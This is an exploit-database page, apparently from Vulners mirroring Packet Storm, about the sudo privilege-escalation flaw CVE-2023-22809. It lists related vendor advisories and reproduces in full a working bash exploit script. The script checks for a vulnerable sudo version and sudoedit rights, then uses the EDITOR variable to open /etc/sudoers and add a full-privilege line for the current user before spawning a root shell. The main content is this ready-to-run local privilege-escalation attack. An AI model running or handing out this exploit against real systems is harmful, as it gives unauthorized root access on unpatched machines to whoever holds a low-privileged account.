Lucene search

K

sudo 1.9.12p1 Privilege Escalation

🗓️ 03 Apr 2023 00:00:00Reported by n3m1.sysType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 812 Views

sudo 1.9.12p1 Privilege Escalation, CVE-2023-22809, Gain root shell using sudoers fil

Show more
Related
Code
ReporterTitlePublishedViews
Family
Rapid7 Blog
Metasploit Weekly Wrap-Up
2 Jun 202316:20
rapid7blog
F5 Networks
K000132667 : Sudo vulnerability CVE-2023-22809
20 Feb 202300:00
f5
AlmaLinux
Important: sudo security update
23 Jan 202300:00
almalinux
AlmaLinux
Important: sudo security update
23 Jan 202300:00
almalinux
Amazon
Important: sudo
2 Mar 202322:36
amazon
Amazon
Important: sudo
31 Jan 202320:44
amazon
CBLMariner
CVE-2023-22809 affecting package sudo for versions less than 1.9.12p2-1
24 Feb 202301:54
cbl_mariner
CBLMariner
CVE-2023-22809 affecting package sudo 1.9.12p1-1
2 Mar 202304:18
cbl_mariner
OSV
Red Hat Security Advisory: sudo security update
16 Sep 202410:29
osv
OSV
Red Hat Security Advisory: sudo security update
16 Sep 202410:30
osv
Rows per page
`#!/usr/bin/env bash  
  
# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation  
# Exploit Author: n3m1.sys  
# CVE: CVE-2023-22809  
# Date: 2023/01/21  
# Vendor Homepage: https://www.sudo.ws/  
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz  
# Version: 1.8.0 to 1.9.12p1  
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9  
#  
# Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc  
#  
# Running this exploit on a vulnerable system allows a localiattacker to gain   
# a root shell on the machine.  
#  
# The exploit checks if the current user has privileges to run sudoedit or   
# sudo -e on a file as root. If so it will open the sudoers file for the  
# attacker to add a line to gain privileges on all the files and get a root   
# shell.  
  
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'  
then  
echo "> Currently installed sudo version is not vulnerable"  
exit 1  
fi  
  
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)  
  
if [ -z "$EXPLOITABLE" ]; then  
echo "> It doesn't seem that this user can run sudoedit as root"  
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2  
else  
echo "> BINGO! User exploitable"  
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"  
echo "$( whoami ) ALL=(ALL:ALL) ALL"  
read -n 1 -s -r -p "Press any key to continue..."  
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE  
sudo su root  
exit 0  
fi  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo